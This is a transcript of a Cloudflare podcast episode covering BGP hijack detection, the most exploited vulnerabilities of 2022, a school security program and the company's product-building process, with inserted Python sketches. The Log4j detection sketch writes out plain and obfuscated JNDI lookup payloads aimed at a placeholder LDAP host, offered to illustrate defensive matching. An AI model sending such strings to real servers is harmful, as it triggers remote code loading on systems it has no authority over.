BGP hijack detection, exploited vulnerabilities, and how we build our products

Presented by: John Graham-Cumming, João Tomé

Originally aired on September 10, 2024 @ 12:00 AM - 12:30 AM EDT

Welcome to our weekly review of stories from our blog and other sources, covering a range of topics from product announcements, tools and features to disruptions on the Internet. João Tomé is joined by our CTO, John Graham-Cumming.

In this week's program, most of our Portugal team is responsible for welcoming everyone. We also cover some of the blog posts from the last two weeks. This includes Cloudflare Radar's new BGP origin hijack detection system, the most exploited vulnerabilities of 2022, and our Project Cybersafe Schools, which offers free security tools to small K-12 school districts in the United States.

We will also focus on a more general topic: the process of building things, from new features to the decision-making process of working on shipping new categories of products to the world. How has Cloudflare approached this, from ideas to demos to iteration? And how has the process evolved over the years? Workers, our developer platform used by many thousands of developers, is one example of this.

Transcript (Beta)

Three, two, one. Hello from Lisbon, Portugal, and welcome to This Week in NET. Say bye. Hello, everyone, and welcome to This Week in NET. We're live from Cloudflare's Lisbon office in Portugal. It's the August 11, 2023 edition, and we're going to share a few highlights from our blog, but also go into how we build stuff in a way, the Cloudflare way. I'm João Tomé, based in Lisbon, and with me I have, as usual, our CTO, John Graham-Cumming. Hello, John, how are you? I'm fine, thank you. How are you doing? I'm good, too. We're not far away. We're both in the Lisbon office today. Yeah, where are you? Can I see you if I look? It's possible because I'm there. It's true. We have a bunch of visits today, actually, from the U.S. in the Lisbon office. I just witnessed a fireside chat with Dane Knecht, our senior vice president. Emerging Technology and Incubations, one of the engineering leaders in Cloudflare. Exactly. So it's busy for August, the Lisbon office today. And, of course, Matthew is here. A lot of people are here, so it's good to see this proximity in terms of its office in Europe, but a lot of people from the U.S. are here. Actually, I don't know where you are, but I'm in a glass wall office where half the company is lining up over there getting lunch. So we're recording this and I can smell the food coming into the room. I can't because I'm further away. Well, we were out for two weeks. A few blog posts to mention. So let me just share my screen and then we can... Yeah, let's do it. Let's do it. This is the view of our more recent blog posts, in a sense. Since we went away, in a sense, there's this Cloudflare Radar new BGP Origin Hijack Detection System blog post. That's pretty cool, actually. So Cloudflare Radar has just been growing and growing and growing with more and more stuff, more and more data about what's happening on the Internet. And recently we've had a bunch of stuff around BGP, but we've also been starting to do detection of hijacks.
So when someone's BGP, where their ASN is, is misdirected. And we've done this internally for a while and now added it as a feature. So you can go in and look at the hijacks that are happening on the Internet where traffic gets misdirected because of something happening in BGP, often deliberately and sometimes accidentally. And there's a new page on Radar and there's a new alerting mechanism so you can actually see how the Internet gets disrupted sometimes. And I think people don't necessarily appreciate that BGP is the thing that makes the Internet. In a sense, the Internet is a network of networks. And how those networks find each other and know who's connected to who and how to get from one place to another is BGP. It lays out kind of the route map of the Internet, like how to get from place to place. And weirdly enough, there's no security built into BGP itself. If you read the original BGP RFCs, there are no security features. So security features have been layered on, one of which is RPKI, which as we mentioned in the blog post here. But because there's no security, it is possible sometimes for people to deliberately or accidentally claim to be some network that they're not. Like there was a very famous example a few years ago in Pakistan where the government wanted to censor YouTube and they accidentally said that they were all of Google. And a tremendous amount of traffic suddenly got sent to Pakistan, which is probably not a good idea, not what they intended. But these things happen. And it was a disruption, right? It was a disruption, yes. And so over time, we as a community have worked to make things better. But we have built this system which can detect when we believe an origin is being hijacked, taken over by someone else. That is to say someone's network is being misdirected. And read all about it in this very long blog post, which describes how we built the module, what data sources we're using. 
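To make the idea of an origin hijack a little more concrete, here is a minimal sketch in Python. It is not how the Radar detection system works (the conversation only says it draws on several data sources); it simply assumes we hold a hypothetical table of which AS is expected to originate which prefix, and flags announcements that fall inside a known prefix but come from a different AS. The names `ExpectedOrigin`, `Announcement`, and `find_suspicious` are invented for illustration, and the prefixes and AS numbers are from the ranges reserved for documentation.

```python
from ipaddress import ip_network
from typing import List, NamedTuple


class ExpectedOrigin(NamedTuple):
    prefix: str      # address block a network is known to hold (hypothetical data)
    origin_asn: int  # AS number expected to originate that block


class Announcement(NamedTuple):
    prefix: str      # prefix seen in a BGP announcement
    origin_asn: int  # AS number claiming to originate it


def find_suspicious(announcements: List[Announcement],
                    expected: List[ExpectedOrigin]) -> List[Announcement]:
    """Return announcements that fall inside a known prefix but name another origin AS."""
    suspicious = []
    for ann in announcements:
        ann_net = ip_network(ann.prefix)
        # Expected entries whose prefix covers the announced prefix (same IP version only).
        covering = [
            e for e in expected
            if ip_network(e.prefix).version == ann_net.version
            and ann_net.subnet_of(ip_network(e.prefix))
        ]
        # Unknown prefixes are skipped; known ones must match an expected origin.
        if covering and all(e.origin_asn != ann.origin_asn for e in covering):
            suspicious.append(ann)
    return suspicious


expected = [ExpectedOrigin("203.0.113.0/24", 64496)]
seen = [
    Announcement("203.0.113.0/24", 64496),   # the expected origin
    Announcement("203.0.113.0/25", 64511),   # more specific prefix, different origin
    Announcement("198.51.100.0/24", 64500),  # prefix we hold no expectation for
]
for ann in find_suspicious(seen, expected):
    print(f"possible origin hijack: {ann.prefix} announced by AS{ann.origin_asn}")
```

A real detector would need far more context than this, for example legitimate multi-origin prefixes and known relationships between networks, which is why this is only a sketch of the basic comparison.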
And then you can just go to radar.cloudflare.com, I think, slash routing, I think. And you can see all that information on Radar. It is. Routing is the place to go. And if you haven't been on Radar recently, look at that menu on the left there, traffic data, security data, adoption of protocols, Internet quality, which is really interesting. We talked about it once before. We did. Which is around, you know, how good are ISPs in different axes, outage center, what things are out, the URL scanner. You can check a URL to see if it's genuine or not. You know, if you get one of those, like if you get a weird text message with a URL in it, well, you can pump it into here and we'll look at it for you rather than you risking your browser or something. So Radar has really grown enormously. Yeah. So BGP hijack detection is the latest thing. And for me, it was like a surprise when I got to understand that hijack is really hijack. The name is correctly put there because it's all about the Internet. But it's something that hijacks the way the Internet was supposed to work, in a sense. Yeah. So it's quite important. And this alerts and notifications part is quite important, too. Yeah. I mean, this is how we're going to be able to alert you if a particular network is being hijacked, for example. And we've certainly seen hijacks be the source of outages in the past. Exactly. There's a bunch here explaining that. And by the way, who is the typical user of these types of things? Like those thousands of people that work in networking, right? Yeah, probably the people who work in networking in general will be very, very interested to see this stuff as we put it out there. So it'll be useful. But also, if you're curious, like your ISP doesn't seem to be working, you can go to the hijack page. You go to your ISP's page and it will actually tell you, are we seeing an outage? Are we seeing, you know, some issue that's related to BGP or some other issue?
So definitely, definitely worth checking out Radar. There's so much in here. And actually, you paused on the API. I think this is the hidden gem in Radar, this incredibly rich API where everything that's in the UI and more is available. And more. And more is available through the API. Well, in particular, you can combine data in the API. So you can like, you know, look at two trends simultaneously and stuff like that. So definitely worth checking out. True. I use the API all the time because, again, it has more than the Radar front end in general. So that's a good place to start, too. We also had some Workers posts, like the database integration. Well, let's do the Hardening Workers KV one, because I think that is really worth it. So we'd had a sort of series of incidents during July with Workers KV. So Workers KV is a product that gives you key-value storage that can be used within Workers. And these incidents impacted customers. And so we really wanted to look into, you know, what the issues were and what was happening. And one of the problems with KV is we use it ourselves. One of the good things. Right. We eat our own dog food. We drink our own champagne. Right. We use Workers KV internally. So if there's a Workers KV problem, then it affects customers who don't necessarily directly use KV. And so this was just a blog post. We have a habit, when there's an outage, of really talking about the detail of it. That's part of what Cloudflare does. And, you know, here we are. I mean, we go through in a lot of detail about what caused these particular outages. And so if you're interested in outage reports and how things go wrong, this is the blog post for you. And if you were affected, you'll be able to find out what happened. So, you know, obviously detailed timeline. And then and so on. And look at how, you know, how we dealt with the problem.
It's interesting even to understand how these types of risks can happen. Right. How it happened and, you know, what improvements we're making. So. Exactly. More that we had in the blog. Some Zero Trust news. Yeah. I mean, as you say before, there was the one about Workers and Upstash. That's a nice integration with Upstash. Here we have an integration with Datadog for the Zero Trust stuff. So lots of the infrastructure that's around Cloudflare. Because obviously we don't just work in isolation. Our customers use us with other things. So. True. And we also have Unmasking the top exploited vulnerabilities of 2022. Right. This, in a sense, it's following up on a report from CISA, the Cybersecurity and Infrastructure Security Agency from the US. They released a report highlighting the most commonly exploited vulnerabilities. And in a sense, because we also have a very good perspective in terms of the Internet, we try to do our own analysis in terms of some of those vulnerabilities there. And we did a popularity ranking in a sense of the top CVEs, the vulnerabilities in this case for 2022. Yeah. I mean, it sort of doesn't surprise me that Log4j and in general, right, improper input validation that caused Log4j is still popular because, of course, people are still scanning for it. Because one of the things about Log4j is like how long it persisted. Right. You know, many, many attacks are things that happen and instantaneously you've broken in. But with Log4j, because strings could get passed around by back end systems, often those back end systems were written in Java. You could have something happen, you know, potentially days or weeks or even months later. So it was worth kind of spraying the whole world with bad strings to see if at some point you got in. So I'm not surprised that was around. And the Atlassian one, again, Confluence is very popular.
And, you know, people trying to get into Confluence, especially because Confluence, because it's a wiki, likely contains a lot of sensitive information in a company. So breaking into it would be very, very valuable for an organization, as does the third one, Microsoft Exchange. I mean, if you get into Microsoft Exchange, you can get into a company's email. And also we saw recently some actually very direct hacks against, you know, email handled by Microsoft, which has been causing problems. So, you know. Not a big surprise there. And then, you know, obviously we carry on with other things, you know, where the BIG-IP one is interesting because that's a piece of infrastructure. Right. If you can get into a piece of infrastructure, you can probably do something. And we saw attacks in the past against, you know, physical infrastructure devices and so on. I mean, you see these kind of things. But yeah, Log4j is the winner of 2022. So not for good reasons in a sense, but these vulnerabilities can, like you were saying, can be exploited much later. After the Log4j one can. Yeah, the Log4j one. Absolutely. Yes. So it's always good to be aware and know that the protections are in place in the services you use. Well, yeah. And also just the hell of going through every, you know, every system that has Java in it and seeing if it was using, you know, Log4j. It was a really big, big task for companies. And as with so many of these vulnerabilities, it dropped just before Christmas. So we all got to spend our Christmas trying to remediate it. I remember that we had a blog post about that. More than one. I think we had two or three blog posts about what we're doing to protect our customers, what we're doing. Because one of the things that happened with Log4j was initially our response was to protect our customers. Right. There was all the scanning going on.
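As a rough illustration of why matching those "bad strings" is harder than it sounds, here is a small Python sketch. The Log4j attack strings were lookup expressions beginning with `${jndi:`, and Log4j also supports nested `${lower:...}` and `${upper:...}` lookups, which lets an attacker spell the same thing in ways a plain substring check misses. The functions below are invented for illustration and are not the rules any real WAF used; they only show a naive check next to one that resolves the simple case-changing lookups first.

```python
import re

# Matches an innermost ${lower:...} or ${upper:...} lookup (no nested braces inside).
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)


def naive_match(text: str) -> bool:
    """Plain substring check for the literal JNDI lookup prefix."""
    return "${jndi:" in text.lower()


def resolve_case_lookups(text: str) -> str:
    """Repeatedly replace ${lower:x} / ${upper:x} with x until nothing changes."""
    def _resolve(match):
        kind, value = match.group(1).lower(), match.group(2)
        return value.lower() if kind == "lower" else value.upper()

    previous = None
    while previous != text:
        previous = text
        text = _CASE_LOOKUP.sub(_resolve, text)
    return text


def normalized_match(text: str) -> bool:
    """Resolve simple nested lookups first, then apply the substring check."""
    return naive_match(resolve_case_lookups(text))


plain = "${jndi:ldap://example.invalid/a}"
obfuscated = "${${lower:j}ndi:ldap://example.invalid/a}"

print(naive_match(plain), naive_match(obfuscated))            # True False
print(normalized_match(plain), normalized_match(obfuscated))  # True True
```

Even the second check only covers one family of variations, so it should be read as a picture of the problem, not a complete defense.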
And then there was a bit of a cat and mouse thing with the WAF where people were adjusting the patterns that were being used in the WAF. And then actually very quickly, actually, right at the beginning, we're suddenly like, wait a minute. We use Java internally because we use Apache Kafka and various other things. And so we ourselves had to go and patch and figure out if we were vulnerable. Makes sense. And again, we're trying mostly to augment a little bit the CISA vulnerability report. Right. And showing our own perspective there. Yep. Tell us about Cybersafe. You know about Cybersafe and I don't really know much about that. So actually this is a great initiative from our policy team in a sense. Our policy team actually was at the White House this week presenting all about this type of, this project in a sense. This is a project where we're actually giving to K-12 schools in the U.S. at least with less than 2,500 students, I believe, our Zero Trust cybersecurity services. And this comes to, in a sense, a preoccupation that the U.S. has and this White House has in terms of making schools more safe. Because education is one of those sectors that several times is vulnerable to cybersecurity incidents. There's not a lot of money sometimes in some schools to spend on cybersecurity. So we're trying to help there with this project. It's not the first time we have projects like this. And this was announced this week, this one in specific. There's also some data here that I actually helped put together. For example, in Q2 2023, we blocked an average of 70 million cyber threats each day targeting U.S. education sector websites, Internet properties. And there was a big increase, 47% in DDoS attacks quarter over quarter also in the second quarter. And we also have some examples here of some public schools in the U.S., the target of attacks. So this is a trend, in a sense, that is happening and we're trying to help there. A pretty sad trend.
I mean, it's like we've seen hackers go after hospitals and other bits of kind of civil infrastructure, right? Health is also one of those situations where it's pretty much common. One of the big areas, yeah. True. And there's other projects actually related in a sense like Project Galileo. We already spoke about that in previous episodes. And also Project Safekeeping that it's actually for Europe, for example, and other countries is doing a little bit of that Q12. So this one was presented in December and is actually helping those types of pretty much needed infrastructure that are vulnerable with our products in many countries, including Portugal. So that's our Project Cybersafe Schools for you. Yeah, that was great. A great, great initiative for many of these things. And more recently, we also introduced this feature in a sense. Yeah, it's a little feature, right? If you're using Advanced Certificate Manager, you're an enterprise customer and it's just more configuration options, right? In this case for TLS. So there's one of those blog posts that's in our continuous improvement of the product kind of things. It's not sort of dramatic, big announcement or something like that, but it's like, here's another feature. And there's actually another one going out today about Cloudflare Stream, which is our video streaming product. We now added a feature where you can set an automatic deletion date. And that will go out in about, well, by the time you're watching this, it'll definitely be out. So, yeah, because some people want to like stream video and have it available for 30 days or something and make it disappear automatically. So we're adding yet another little cool feature that's coming. Here it is. That one. Nope, that's not that one. That's a different one. No, it's not. That's another one. That might go out today too. True. Debug queues from the dash. Yeah. This is a very, very cool feature built by an intern. It's really, really cool.
But I don't know if it's going out today or not yet. Maybe. Okay. Let's not dwell on that one. We still have a few minutes. I want to talk about we're doing sometimes these initiatives like talking about Cloudflare history or Internet history or computing history. And in this case, I was aiming to talk about how, in a sense, how we build stuff. How the process from idea to a little bit of science to technology to shipping a product works. How would you summarize that process? Actually, let me start, actually. We have now something called demo hour with you and Dane Knecht. Oh, yes. And I've been fascinated by that because I learned a lot just by hearing the feedback. You can see the collaboration going on. Someone presenting something. Someone that is building something, presenting something. And the idea is flowing, right? Yeah. Was that like that in the beginning? Well, no. I mean, the thing is, in the beginning, when the company is so small, you don't need any situation set up. They don't need to create a demo, right? Because people will just show you stuff. And, in fact, our internal company meeting, which is called the BEER meeting, although there's no beer available, used to have product demos in it, like someone would demo stuff, because right at the beginning. And then, of course, over time, that no longer made sense, right? Like the company is getting huge. So you lost a little bit that. So we reinstated this idea of demo hour, which is people come. There's just a bunch of people demo stuff. Big, big, big focus on demoing, not producing presentations. Sometimes people have slides, but we're like, really? I mean, the less slides I see, the better. And just demo what they're working on. Yesterday, we saw a bunch of really cool stuff around R2, around how the core technology in R2 works.
And we saw a bunch of stuff around Privacy Pass, which is a really interesting zero-knowledge way of proving something to a website, such as you own an account or you're human or something like that, without giving away any information in either direction, right? So the website doesn't learn who you are. And if there's an intermediary, the intermediary doesn't learn any connection. And actually, we're seeing those kind of technologies get used quite a lot. So if you use iCloud Private Relay, which we help with some of the infrastructure for, again, that breaks the link between who you are and what's being done. And I think that's actually a big future trend for the Internet in general, is to not make everything so trackable and so easy to link up. I'm curious about, we have a research team, but in the beginning, there was no research team, of course. Actually, it was the cryptography team, right? In what way science plays a role in finishing products? How is that decision made? Oh, we're working on this in terms of research, of science, of patents, for example. And then we start using this, thinking of this as a product. How can we ship this? Well, I think we've always had a bias towards shipping stuff, right? And you will have noticed that we ship and ship and ship and ship continuously. So we want to get stuff out early. So the whole company, I think, really is into shipping. I think you asked specifically about the research team. I mean, the research team, what we have in that team is a bunch of people who are, they lean more towards the academic side than the engineering side. That's not to say there aren't engineers in there, but it's more working with universities, working with standards bodies sometimes. And they tend to be working on things that are a bit further out. 
So the fact that we were rolling out post-quantum cryptography is because the research team was deeply involved in the original algorithms and the testing of those algorithms in coordination with other people in the industry. So they are a way of keeping us ahead on all technologies, right? But ultimately, we will want to ship those things in our products, right? So they're not doing pure research. So they're not Bell Labs, and they're probably not going to reinvent the transistor and then suddenly realize it's the greatest thing ever. But I think that they are doing stuff which looks us out five years. And it's interesting, you were talking earlier about Dane Knecht's group, which is emerging technology. They're probably looking at things out that are maybe a year or two, like slightly different bets, right? So we have these different setups of different teams that are working at different kind of like risk profile and time to ship and all that kind of stuff, although there's a focus on shipping for everybody. About that, in terms of shipping, there's a lot of products, like you were saying, that we launched. We were known for that. How has the shipping things and break things perspective in Cloudflare evolved? Because shipping, for example, you ship, you see the feedback. We have a lot of free customers. That also helps in terms of giving us that feedback. But how does the iteration works with so much shipping? Well, I do think it's one of the most interesting things about Cloudflare, right? As we've scaled up, which is in the beginning, when we were very small, we could ship something. And if we broke all of Cloudflare, well, 1,000 customers, it was bad for them, but it was not the impact it is today. If you break all of Cloudflare today, I mean, we think we're handling about one in five websites and APIs and apps on your phone and companies' back ends. We just can't break, right?
So the interesting challenge is how do you keep shipping stuff super, super fast and not break your network? And, of course, the way you do that is a whole bunch of infrastructure in how you roll things out. We have this thing where we can slice our entire global network into little sections, and then we can give different users different versions of the software so we can observe that around the world. So that really would minimize a breaking change. We have all sorts of testing stuff being done. There's a lot of new, actually, internal work being done on the testing infrastructure for everything. So it's like that is actually kind of a fascinating thing, which is like how do you build a system that you can roll out new changes to and roll back really fast if you need to? And even if you did break something, the impact is minimized. Because in the beginning, the sort of ship fast and break things is great. Now it's like ship fast. If you break something, make sure the impact of that break is tiny, and you can unbreak very fast. Makes sense. There's this perspective in terms of choosing what to work on. We're always shipping a lot, but we must choose, because ideas, everyone has those. We must choose what to work on. In terms of that type of strategy, in the beginning, of course, we had not that many products, so that decision probably was more easy. How is the process of what should we focus on? What should we build and ship next, now? Well, it depends on what level you're thinking about. Because if you think about the announcement of the TLS thing we just talked about in advanced certificate stuff, there's a product management team, and then the associated engineering team working very close to them. They have a planning process, and they're making trade-off decisions about what features and what customers want, what the market looks like. So they have a whole plan, right? And every three months, they know all this stuff's coming out.
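The rollout approach described a moment ago, slicing the network into sections, giving a section the new version, observing it, and rolling back fast if something breaks, can be sketched in a few lines of Python. This is only an illustration of the general staged-rollout idea under simple assumptions; the slice names, the `is_healthy` callback, and the `staged_rollout` function are hypothetical and say nothing about Cloudflare's actual tooling.

```python
from typing import Callable, Dict, List, Tuple


def staged_rollout(slices: List[str],
                   old_version: str,
                   new_version: str,
                   is_healthy: Callable[[str], bool]) -> Tuple[Dict[str, str], bool]:
    """Roll new_version out one slice at a time; roll everything back on the first failure.

    Returns the version each slice ends up running and whether the rollout completed.
    """
    running = {name: old_version for name in slices}
    for name in slices:
        running[name] = new_version
        # Observe the slice that just received the new version before going further.
        if not is_healthy(name):
            # Fast rollback: every slice returns to the old version.
            for touched in running:
                running[touched] = old_version
            return running, False
    return running, True


slices = ["slice-1", "slice-2", "slice-3", "slice-4"]

# Hypothetical health check: pretend the new version misbehaves on slice-2.
result, completed = staged_rollout(slices, "v1", "v2", lambda name: name != "slice-2")
print(completed, result)
```

In this sketch only the first two slices ever run the new version before the rollback, which is the point made in the conversation: a break is allowed to happen, but its impact stays small and it can be undone quickly.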
And then we have emerging technology and research, which are doing things like longer bets. So their planning won't be so detailed in the same way as maybe the product team does, but they'll also be perhaps slightly more making a bet around, okay, we think we should enter this market area, or we think this large feature area should be done. So they'll be working off in that direction. So they're doing less of the talking to all the customers, figuring out the very detailed kind of product management stuff, and a bit more of the slightly pie in the sky. We famously did something which was essentially a failure, right? We were very, very involved in Google AMP. And Google AMP is really disappearing at this point. But that was a thing that emerging technology was able to do, was able to say, we're going to make a bet on this. We're going to see what happens, where it goes, et cetera, et cetera. To be honest, as a former journalist, I used a lot of Google AMP as a coordinator of a website, a journalist's website. So a few years ago, that was huge for a journalistic company. It was huge. And we were the only people who had an independent AMP cache. And so here we are. But for example, there's also a twist there. For example, we created new categories. Like WARP, like Zero Trust, like Workers. Those were created. What is the process there of, hey, let's go into this. This is a new chapter for us. Let's go into this. Well, to be honest, there's been a long list of things Cloudflare has wanted to do right from the very beginning. We have essentially stayed on a plan that was formed 12 years ago. Obviously, things have come along, and we've reacted to the market, and we've changed a little bit. But we have never gone through a big pivot and changed total direction. So something like Workers, we originally actually used to do custom code for our customers. And it was a nightmare because we would write it for them.
And we would have to... it was actually part of our main software build. So every time a customer changed something, we had to rebuild our software. Obviously, that was not viable. And so Workers came out of a real need for this. And then particularly when the Sandstorm team, so particularly Kenton Varda, who's sort of the spiritual leader of the Workers team, came on board, there was this idea that we could expand what we were doing around programmability of our platform to make it this really new type of development platform. So I remember very well actually having lunch with a few people, Matthew, the CEO, Kenton, myself, and I think there was a couple of other people there in a Mexican restaurant in San Francisco where we're like, we should definitely do this Workers thing. Let's just do it. Let's make the platform programmable. So it depends. Some of those things are like a little bit top down. Some of those big strategic things, it sort of depends what it is. And it's quite interesting, especially to see a product like Workers. It's used by thousands of developers. Millions, I think. Maybe millions at this point. So I don't know the actual number exactly, but it's incredibly, incredibly popular. Yeah, it's quite amazing to see that process. This was a great sum up, short sum up for how we do stuff. Thank you, John. Yeah, nice to see you. You're out next week, so we will come back when you will come back too. No, I think I'm back. I think I'm here next week. Oh, you are? Unless you know about vacation I didn't know about. I thought you were out. No, I'm pretty sure we'll have another This Week in NET next week, so see you then. What I am going to do is go and get lunch because it's right over there. See you in a bit. Bye-bye. Bye. Say bye. Perfect.

This Week in NET

Tune in for weekly updates on the latest news at Cloudflare and across the Internet. Check back regularly for updates. Also available as an audio podcast!